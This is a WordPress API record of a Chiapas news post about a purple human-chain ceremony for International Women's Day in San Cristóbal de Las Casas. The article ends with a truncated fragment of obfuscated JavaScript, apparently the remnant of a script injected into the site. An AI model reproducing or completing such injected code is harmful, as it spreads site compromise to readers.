{"id":20809,"date":"2025-03-08T05:14:37","date_gmt":"2025-03-08T05:14:37","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20809"},"modified":"2025-03-08T05:14:38","modified_gmt":"2025-03-08T05:14:38","slug":"con-un-lazo-humano-morado-san-cristobal-de-las-casas-conmemora-el-8-de-marzo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20809","title":{"rendered":"Con un Lazo Humano Morado, San Crist\u00f3bal de Las Casas Conmemora el 8 de Marzo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"821\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250307-WA0033-1024x821.jpg\" alt=\"\" class=\"wp-image-20810\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250307-WA0033-1024x821.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250307-WA0033-300x241.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250307-WA0033-768x616.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250307-WA0033-1536x1232.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250307-WA0033.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 07 de marzo de 2025.- En conmemoraci\u00f3n del D\u00eda Internacional de la Mujer, la presidenta municipal, Mtra. Fabiola Ricci Diestel, encabez\u00f3 un acto simb\u00f3lico con la formaci\u00f3n de un Lazo Humano Morado, en el que participaron directivos, regidores y personal del Ayuntamiento. Esta acci\u00f3n represent\u00f3 la unidad en la lucha por la igualdad y los derechos de las mujeres.<\/p>\n\n\n\n<p>Durante su intervenci\u00f3n, la alcaldesa resalt\u00f3 la importancia hist\u00f3rica de esta fecha, recordando a las mujeres que han luchado y sacrificado sus vidas por los derechos que a\u00fan se defienden. \u201cRecordamos a aquellas que nos antecedieron, luchando por nuestros sue\u00f1os\u201d.<\/p>\n\n\n\n<p>Ricci Diestel reconoci\u00f3 los desaf\u00edos que a\u00fan persisten en la lucha por la equidad de g\u00e9nero, pero destac\u00f3 la fortaleza de las mujeres sancristobalenses, a quienes describi\u00f3 como \u201caguerridas y trabajadoras\u201d. Inst\u00f3 a seguir unidas, apoy\u00e1ndose mutuamente y sin permitir que nada las doblegue.<\/p>\n\n\n\n<p>La presidenta tambi\u00e9n celebr\u00f3 los avances en la pol\u00edtica, mencionando la hist\u00f3rica elecci\u00f3n de la Dra. Claudia Sheinbaum como presidenta de M\u00e9xico, un paso importante hacia una naci\u00f3n m\u00e1s incluyente.<\/p>\n\n\n\n<p>Durante el acto protocolario, al hacer uso de la palabra, la regidora Mar\u00eda Jos\u00e9 Velasco Moscoso, presidenta de la Comisi\u00f3n de Igualdad de G\u00e9nero y Acceso a una Vida Libre de Violencia, agradeci\u00f3 la participaci\u00f3n en los eventos conmemorativos, resaltando su importancia para visibilizar la lucha y trascendencia de las mujeres en todos los \u00e1mbitos.<\/p>\n\n\n\n<p>Bajo el lema \u201cPara todas las mujeres y ni\u00f1as: derechos, igualdad y empoderamiento\u201d, la regidora hizo un llamado a la conciencia y sensibilizaci\u00f3n sobre la equidad de g\u00e9nero, destacando que el color morado representa la historia y lucha de las mujeres por la justicia y la igualdad.<\/p>\n\n\n\n<p>Como s\u00edmbolo de unidad, invit\u00f3 a plasmar huellas moradas en un lienzo, reflejando el compromiso de todas y todos en la construcci\u00f3n de una sociedad m\u00e1s justa e incluyente.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. San Crist\u00f3bal de Las Casas, 07 de marzo de 2025.- En conmemoraci\u00f3n del D\u00eda Internacional de la Mujer, la presidenta municipal, Mtra. Fabiola Ricci Diestel, encabez\u00f3 un acto simb\u00f3lico con la formaci\u00f3n de un Lazo Humano Morado, en el que participaron directivos, regidores y personal del Ayuntamiento. Esta acci\u00f3n represent\u00f3 la unidad en la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20810,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-20809","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20809","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20809"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20809\/revisions"}],"predecessor-version":[{"id":20811,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20809\/revisions\/20811"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20810"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20809"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20809"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20809"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}